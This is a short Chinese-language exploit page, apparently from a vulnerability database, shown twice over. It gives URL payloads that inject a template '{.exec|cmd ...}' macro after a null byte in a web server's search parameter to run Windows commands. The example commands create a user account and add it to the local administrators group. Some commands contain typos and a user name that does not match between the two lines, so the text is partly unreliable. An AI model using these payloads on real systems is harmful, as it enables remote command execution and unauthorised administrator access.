VULHUB ™

<p>访问<a href="http://localhost:80/?search==%00" rel="nofollow">http://localhost:80/?search==%00</a>{.exec|cmd.}&nbsp;&nbsp; 直接执行命令<br></p><p><br></p><p>漏洞利用过程</p><p>访问地址</p><p><a href="http://127.0.0.1/?search==%00" rel="nofollow">http://127.0.0.1/?search==%00</a>{.exec|cmd /c net user testsuw@Dmin123! /add.}</p><p><a href="http://127.0.0.1/?search==%00" rel="nofollow">http://127.0.0.1/?search==%00</a>{.exec|cmd /c net localgroupadministrators test123 /add.}</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683535943-1.png" data-image-size="333,338"><br></p><p><br></p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683547508-1.png" data-image-size="404,307"><br></p>

<p>访问<a href="http://localhost:80/?search==%00" rel="nofollow">http://localhost:80/?search==%00</a>{.exec|cmd.}&nbsp;&nbsp; 直接执行命令<br></p><p><br></p><p>漏洞利用过程</p><p>访问地址</p><p><a href="http://127.0.0.1/?search==%00" rel="nofollow">http://127.0.0.1/?search==%00</a>{.exec|cmd /c net user testsuw@Dmin123! /add.}</p><p><a href="http://127.0.0.1/?search==%00" rel="nofollow">http://127.0.0.1/?search==%00</a>{.exec|cmd /c net localgroupadministrators test123 /add.}</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683535943-1.png" data-image-size="333,338"><br></p><p><br></p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683547508-1.png" data-image-size="404,307"><br></p>